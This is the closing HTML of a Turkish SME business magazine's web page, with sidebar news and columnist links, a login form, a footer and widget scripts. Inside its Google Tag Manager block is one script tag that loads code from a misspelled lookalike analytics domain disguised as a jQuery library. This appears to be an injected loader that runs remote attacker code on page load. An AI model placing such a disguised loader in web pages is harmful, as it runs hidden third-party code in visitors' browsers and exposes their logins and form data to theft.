                <div class="item">                                    <a href="http://www.kobi-efor.com.tr/reel-sektor/tbdnin-19-bilim-kurgu-oyku-yarismasina-rekor-katilim-h7051.html" title="TBD&#039;nin &#039;19. Bilim Kurgu Öykü Yarışması”na rekor katılım">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tbdnin_19_bilim_kurgu_oyku_yarismasina_rekor_katilim_h7051_d58d3.jpg" alt="TBD’nin “19. Bilim Kurgu Öykü Yarışması”na rekor katılım" />
                    <p>TBD’nin “19. Bilim Kurgu Öykü Yarışması”na rekor katılım</p>
                  </a>
                  
                                                    </div>
              </div>
            </div>                                                <!-- YAZARLAR -->
            <div id="syazar">
              <div class="header">
                <h5><a href="http://www.kobi-efor.com.tr/yazarlar.html" title="Yazarlar">Yazarlar</a></h5>
                                <a class="control left" href="#" id="syprev"></a>
                <a class="control right" href="#" id="synext"></a>
                              </div>
              <div class="content">
                <div class="item">

                                  <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/ekonomik-iyimserlik-makale,421.html" title="Yalçın Sönmez  (EDİTÖR)" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/yalcin_sonmez_editor.jpg" alt="Yalçın Sönmez  (EDİTÖR)" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/ekonomik-iyimserlik-makale,421.html" title="Yalçın Sönmez  (EDİTÖR)" >Yalçın Sönmez  (EDİTÖR)</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/ekonomik-iyimserlik-makale,421.html" title="Ekonomik iyimserlik" >Ekonomik iyimserlik</a></p>
                    </div>
                  </div>
                                                    <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/turk-yeninin-iyinin-guzelin-ve-dogrunun-arayicisidir-makale,420.html" title="Hilmi Develi" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/hilmi_develi_1_1.jpg" alt="Hilmi Develi" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/turk-yeninin-iyinin-guzelin-ve-dogrunun-arayicisidir-makale,420.html" title="Hilmi Develi" >Hilmi Develi</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/turk-yeninin-iyinin-guzelin-ve-dogrunun-arayicisidir-makale,420.html" title="&#039;Türk, Yeninin, İyinin, Güzelin ve Doğrunun Arayıcısıdır”" >“Türk, Yeninin, İyinin, Güzelin ve Doğrunun Arayıcısıdır”</a></p>
                    </div>
                  </div>
                                                    <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/ihracat-konsantrasyonu-nasil-hesaplanir-makale,419.html" title="Haluk Ünaldı" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/haluk-unaldi-yazar.jpg" alt="Haluk Ünaldı" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/ihracat-konsantrasyonu-nasil-hesaplanir-makale,419.html" title="Haluk Ünaldı" >Haluk Ünaldı</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/ihracat-konsantrasyonu-nasil-hesaplanir-makale,419.html" title="‘İhracat Konsantrasyonu&#039; Nasıl Hesaplanır?" >‘İhracat Konsantrasyonu’ Nasıl Hesaplanır?</a></p>
                    </div>
                  </div>
                                                    <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/gozler-her-seyi-gorur-mu-makale,418.html" title="Turgay Biçer" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/turgay_bicer_1.jpg" alt="Turgay Biçer" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/gozler-her-seyi-gorur-mu-makale,418.html" title="Turgay Biçer" >Turgay Biçer</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/gozler-her-seyi-gorur-mu-makale,418.html" title="Gözler Her Şeyi Görür mü?" >Gözler Her Şeyi Görür mü?</a></p>
                    </div>
                  </div>
                                  </div>
                <div class="item">                                  <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/kadinlarda-kalp-damar-hastaligi-makale,417.html" title="Dr. Füsun Değirmencioğlu" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/fusun_degirmencioglu.jpg" alt="Dr. Füsun Değirmencioğlu" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/kadinlarda-kalp-damar-hastaligi-makale,417.html" title="Dr. Füsun Değirmencioğlu" >Dr. Füsun Değirmencioğlu</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/kadinlarda-kalp-damar-hastaligi-makale,417.html" title="Kadınlarda Kalp Damar Hastalığı" >Kadınlarda Kalp Damar Hastalığı</a></p>
                    </div>
                  </div>
                                                </div>
            </div>
            <div class="header">
                <h5><a href="http://www.kobi-efor.com.tr/yazarlar-alinti.html" title="Konuk Yazarlar Arşivi">Konuk Yazarlar Arşivi</a></h5>
           <!--     <a class="control left" href="#" id="ayprev"></a>
                <a class="control right" href="#" id="aynext"></a> -->
              </div>
            </div>
                                                

                      <!-- ENCOKLAR  -->
            <div class="encoklar">
              <div class="accordion">
                              <div class="accordion-group">
                  <div class="accordion-heading">
                    <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne">
                    <h5><i class="halflings-icon white fire"></i> En Çok Okunan Haberler</h5></a>
                  </div>
                  <div id="collapseOne" class="accordion-body collapse in">
                    <div class="accordion-inner">
                      <ul>
                                                <li><a href="http://www.kobi-efor.com.tr/kapak/turkiye-ihracat-haftasi-2017-ekonomiyi-ozetledi-toparlaniyoruz-h7011.html" title="‘Türkiye İhracat Haftası 2017&#039; ekonomiyi özetledi: &#039;TOPARLANIYORUZ!”" ><!--b>1.</b--> ‘Türkiye İhracat Haftası 2017’ ekonomiyi özetledi: “TOPARLANIYORUZ!”</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/osb-tanitim/gebze-plastikciler-organize-sanayi-bolgesi-osb-40a-donusen-ilk-osb-olacak-h7015.html" title="&#039;Gebze Plastikçiler Organize Sanayi Bölgesi, OSB 4.0&#039;a dönüşen ilk OSB olacak”" ><!--b>2.</b--> “Gebze Plastikçiler Organize Sanayi Bölgesi, OSB 4.0’a dönüşen ilk OSB olacak”</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/ayin-konugu/ankara-valisi-ercan-topaca-ureterek-donusen-ankara-h7012.html" title="Ankara Valisi Ercan Topaca: &#039;Üreterek dönüşen Ankara”" ><!--b>3.</b--> Ankara Valisi Ercan Topaca: “Üreterek dönüşen Ankara”</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/haber/26-kalite-kongresi-ve-2017-turkiye-mukemmellik-odulleri-h7013.html" title="26. Kalite Kongresi ve 2017 Türkiye Mükemmellik Ödülleri" ><!--b>4.</b--> 26. Kalite Kongresi ve 2017 Türkiye Mükemmellik Ödülleri</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/teknoloji/isletmelerde-sanayi-40-devrimi-bilisim-teknolojileri-ve-endustrinin-bulusmasi-h7014.html" title="İşletmelerde Sanayi 4.0 Devrimi; Bilişim teknolojileri ve endüstrinin buluşması" ><!--b>5.</b--> İşletmelerde Sanayi 4.0 Devrimi; Bilişim teknolojileri ve endüstrinin buluşması</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/etkinlik/sanayici-santekte-bulustu-h7016.html" title="Sanayici ‘SANTEK&#039;te buluştu" ><!--b>6.</b--> Sanayici ‘SANTEK’te buluştu</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/finans/denizbankin-kobi-stratejisi-kredinin-cok-otesinde-h7018.html" title="DenizBank&#039;ın KOBİ stratejisi kredinin çok ötesinde…" ><!--b>7.</b--> DenizBank’ın KOBİ stratejisi kredinin çok ötesinde…</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/ceo/anadolu-hayat-emeklilik-genel-muduru-m-ugur-erkan-her-sey-insandan-geciyor-h7017.html" title="Anadolu Hayat Emeklilik Genel Müdürü M. Uğur Erkan; &#039;Her şey insandan geçiyor”" ><!--b>8.</b--> Anadolu Hayat Emeklilik Genel Müdürü M. Uğur Erkan; “Her şey insandan geçiyor”</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/haber/ifs-endustri-gunleri-etkinlikleri-kapsaminda-ankarada-farkli-uretim-metodlarini-anlatti-h7020.html" title="IFS, Endüstri Günleri Etkinlikleri kapsamında Ankara&#039;da farklı üretim metodlarını anlattı" ><!--b>9.</b--> IFS, Endüstri Günleri Etkinlikleri kapsamında Ankara’da farklı üretim metodlarını anlattı</a></li>
                                                <li class="last"><a href="http://www.kobi-efor.com.tr/ajans/genc-ve-girisimci-sosyal-medya-ajansi-clubby-media-h7021.html" title="Genç ve girişimci sosyal medya ajansı; Clubby Media" ><!--b>10.</b--> Genç ve girişimci sosyal medya ajansı; Clubby Media</a></li>
                                              </ul>
                    </div>
                  </div>
                </div>
                                            <div class="accordion-group">
                  <div class="accordion-heading">
                    <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo">
                      <h5><i class="halflings-icon white comments"></i> En Çok Yorumlanan Haberler</h5></a>
                  </div>
                  <div id="collapseTwo" class="accordion-body collapse in">
                    <div class="accordion-inner">
                      <ul>
                                                  <li class="last"><a href="http://www.kobi-efor.com.tr/-h.html" title="" ><!--b>1.</b--> </a></li>
                                              </ul>
                    </div>
                  </div>
                </div>
                            </div>
            </div>
            
                                                            <!--
                                                                                                <!-- REKLAM-58  -->
            <div class="reklam"><div class="fb-page" data-href="https://www.facebook.com/kobiefor" data-width="300" data-height="600" data-small-header="true" data-adapt-container-width="true" data-hide-cover="true" data-show-facepile="true" data-show-posts="true"><div class="fb-xfbml-parse-ignore"><blockquote cite="https://www.facebook.com/kobiefor"><a href="https://www.facebook.com/kobiefor">KobiEfor Dergisi</a></blockquote></div></div></div>
                        
	                <!-- SON YORUMLAR -->
            <div class="sayfalar">
              <div class="header">
                <h5>Son Yorumlar</h5>
              </div>
              <div class="content">
                <ul class="unstyled">
                                    <li><i class="icon-chevron-right"></i> <a href="http://www.kobi-efor.com.tr/haber/uretim-reform-paketi-uygulamaya-geciyor-sanayi-siteleri-tasiniyor-h6593.html#comment_116" title="" >samsun sağlık malzemeleri üretmekten...</a></li>
                                    <li><i class="icon-chevron-right"></i> <a href="http://www.kobi-efor.com.tr/ulke/pazarulke/letonya-h2631.html#comment_114" title="" >lleletonyaletonya çok güzel bir ülke...</a></li>
                                    <li><i class="icon-chevron-right"></i> <a href="http://www.kobi-efor.com.tr/osb/osb-firma-tanitim/catering-ve-toplu-yemekte-kalitenin-markasi-biltur-h1996.html#comment_112" title="" >baklava ustasiyim firmanizda çalışmak...</a></li>
                                    <li><i class="icon-chevron-right"></i> <a href="http://www.kobi-efor.com.tr/haberler/haber/gelisim-osgbnin-ikinci-subesi-ikitellide-h2503.html#comment_103" title="" >çok iyi firma.korhan beyde bir çok konuda...</a></li>
                                    <li><i class="icon-chevron-right"></i> <a href="http://www.kobi-efor.com.tr/kapak/yatirim-ve-istihdama-cozum-kobi-destekleri-h5842.html#comment_101" title="" >yatırım demek istihdam demek. i̇stihdam...</a></li>
                                    <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.kobi-efor.com.tr/ulke/pazarulke/kameruna-gitmeden-kazanilmaz-h2859.html#comment_100" title="" >imalat montaj ustasıyım yurt dışı işe...</a></li>
                                  </ul>
              </div>
            </div>
            

                                                                                                    </div>
              </div>
            </div>
                      </div>
        </div>
      </div>
      <div class="footer">
        <div class="container center">
          <!-- FOOTER -->
<div id="linkler" class="row-fluid">
  </div>
		<!--div class="btn-group dropup">
  			<button class="btn">Hızlı Menü</button>
  			<button class="btn dropdown-toggle" data-toggle="dropdown">
    			<span class="caret"></span>
  			</button>
			<ul class="dropdown-menu">
        		<li><a href="#"><i class="icon-file"></i> Künye</a></li>
				<li class="divider"></li>
        		<li><a href="#"><i class="icon-plus"></i> Sitene Ekle</a></li>
        		<li><a href="#"><i class="icon-thumbs-up"></i> Reklam Ver</a></li>
        		<li><a href="#"><i class="icon-envelope"></i> İletişim Formu</a></li>
    		</ul>
		</div-->
    <hr>
  <div id="footer-alt" class="row-fluid">
  <div class="span2">
    <a href="http://www.kobi-efor.com.tr/" class="logo"><img src="http://www.kobi-efor.com.tr/images/banner/kobiefor_altbolge.png" alt="Kırıkkale  Silah İhtisas  OSB’de arsalar hazır" /></a>
  </div>
  <div class="span10">
    <ul class="unstyled">
      <li><a href="http://www.kobi-efor.com.tr/kunye.html"><i class="halflings-icon link"></i> Künye</a></li>
      <li><a href="http://www.kobi-efor.com.tr/anketler.html"><i class="halflings-icon check"></i> Anketler</a></li>
      <li><a href="http://www.kobi-efor.com.tr/roportajlar.html"><i class="halflings-icon tags"></i> Röportajlar</a></li>
      <li><a href="http://www.kobi-efor.com.tr/astroloji"><i class="halflings-icon globe"></i> Astroloji</a></li>
      <li><a href="http://www.kobi-efor.com.tr/sitene-ekle.html"><i class="halflings-icon plus-sign"></i> Sitene Ekle</a></li>
      <li><a href="http://www.kobi-efor.com.tr/iletisim.html"><i class="halflings-icon usd"></i> Reklam Ver</a></li>
      <li><a href="http://www.kobi-efor.com.tr/iletisim.html"><i class="halflings-icon envelope"></i> İletişim Formu</a></li>
    </ul>
        <p>&copy; 2017 - Sitemizde yayınlanan haberlerin telif hakları haber kaynaklarına aittir. İzin alınmadan kopyalanamaz.</p>
        <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim">TE Bilişim</a></p>
  </div>
  </div>
<!-- FOOTER ***************************************************** -->        </div>
        <div id="top" class="btn btn-inverse">Yukarı Çık</div>
      </div>
      <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
  <div class="modal-header">
    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
    <h3 id="myModalLabel">Üye Girişi</h3>
  </div>
  <div class="modal-body">
<form class="form-horizontal" action="http://www.kobi-efor.com.tr/index.php?m=login" method="post">
  <div class="control-group">
    <label class="control-label" for="inputName">Kullanıcı</label>
    <div class="controls">
      <input id="inputName" value="" name="kullanici" type="text"  placeholder="Kullanıcı" required>
    </div>
  </div>
  <div class="control-group">
    <label class="control-label" for="inputPassword">Şifre</label>
    <div class="controls">
      <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required>
    </div>
  </div>
  <div class="control-group">
    <div class="controls">
      <button type="submit" class="btn btn-info">Giriş Yap</button>
    </div>
  </div>
</form>
  </div>
  <div class="modal-footer">
    <a href="http://www.kobi-efor.com.tr/uyelik.html" class="pull-left btn">Üye Ol</a>
    <a href="http://www.kobi-efor.com.tr/sifremi-unuttum.html" class="pull-left btn">Şifremi Unuttum</a>
    <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button>
  </div>
</div>



   
  <div class="reklam dikey sol" > 
                                                  </div>
    <div class="reklam dikey sag ortala">
                  <p><a href="http://www.kobi-efor.com.tr/banner.php?id=199" target="_blank" rel="nofollow"><img src="http://www.kobi-efor.com.tr/images/banner/imesosb-160x600-banner.gif" width="160" height="600" style="width:160px;height: 600px;border:0" alt="banner199" /></a></p>                                                                                                                                                                    </div>



	
                    


<script src="http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/login.js"></script>
<script src="http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/yepnope.1.5.4-min.js"></script>
<script>
	yepnope({
		load: [
			'https://code.jquery.com/jquery-1.9.1.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/jquery.cookie.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/jquery.mousewheel.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/jquery.scrollbar.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/jquery.cycle.lite.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/base.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/hs.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/waypoints.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/sticky.min.js',
						,'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/comments.js'									,'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/system.js',

		],



		complete : function(){  
		      
			$(function(){  
				$.getScript('http://platform.twitter.com/widgets.js');
				$.getScript('http://www.google-analytics.com/ga.js');
																

				if (typeof (FB) != 'undefined') {
					FB.init({ status: true, cookie: true, xfbml: true });
				} else {
					$.getScript("http://connect.facebook.net/tr_TR/all.js#xfbml=1", function () {
						FB.init({ status: true, cookie: true, xfbml: true });
					});
				}

				if (typeof (gapi) != 'undefined') {
					gbuttons.each(function () {
						gapi.plusone.render($(this).get(0));
					});
				} else {
					$.getScript('https://apis.google.com/js/plusone.js');
				}


			});
			


   			hs.graphicsDir = 'http://www.kobi-efor.com.tr/_themes/hs-vertigo/images/hs/';
   			
			$.getJSON(site_url + 'cache/static/twitter_followers.json',function(data) { 
				$('a#followers').html(data);
			});

			var graph_url = 'https://graph.facebook.com/'+facebook_user;
			$.getJSON(graph_url, function(data) {
			  $('a#likes').html(data.likes);
			});


			

			$('.sticky-menu').waypoint('sticky', {
				wrapper: '<div class="sticky-wrapper" />',
				stuckClass: 'stuck'
			});

							$('body').append($("<div class='popup hiding' id='article-finished'></div>"));
				$("#article-finished").html("").append($("#ilgilihaberler2"));


				$('.footer').waypoint(function(direction) {
				  $('#article-finished').toggleClass('hiding', direction === "up");
				}, {
				  offset: function() {
				    return $.waypoints('viewportHeight') - $(this).height() + 500;
				  }
				});
			

			


			



			




			


			
			
						

   
		 }  




	});

</script>


    <!-- Google Tag Manager -->
<noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-W3SBKW"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-W3SBKW');</script>
<script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script>
<!-- End Google Tag Manager -->    


           


    <div id="fb-root"></div>
        <script type="text/javascript">
      var fbTitle  = encodeURIComponent("Kırıkkale  Silah İhtisas  OSB&#039;de arsalar hazır");
      var fbUrl    = encodeURIComponent(location.href);
      var fbThumb  = "http://www.kobi-efor.com.tr/images/haberler/thumbs/kirikkale_silah_ihtisas_osbde_arsalar_hazir_h7063_d7574.jpg";
      var fbDesc   = encodeURIComponent("Kırıkkale Valisi Mehmet İlker Haktankaçmaz, Kırıkkale Silah İhtisas OSB&#039;de gelinen durumu açıkladı. Silah İhtisas OSB&#039;nin Türkiye&#039;de ilk ve tek olduğunu vurgulayan Haktankaçmaz, şunları söyledi:");
    </script> 
    
<div id="ilgilihaberler2">
          <p><a href="http://www.kobi-efor.com.tr/osb-den-haber/diyarbakir-da-bagimsiz-tekstil-kenti-kuruluyor-h7062.html" title="Diyarbakır&#039;da bağımsız ‘Tekstil Kenti’ kuruluyor"><b>Diyarbakır&#039;da bağımsız ‘Tekstil Kenti’...</b>
      <br>Güneydoğu Tekstil Sanayi ve İşadamları Derneği (GÜNTİAD) Başkanı İhsan Oğurlu, Diyarbakır&#039;da...</a></p>
      <p><a href="http://www.kobi-efor.com.tr/osb-den-haber/diyarbakir-da-bagimsiz-tekstil-kenti-kuruluyor-h7062.html" title="Diyarbakır&#039;da bağımsız ‘Tekstil Kenti’ kuruluyor" class="btn btn-danger btn-small">Haberi Oku</a></p>
    </div>


  </body>
</html>
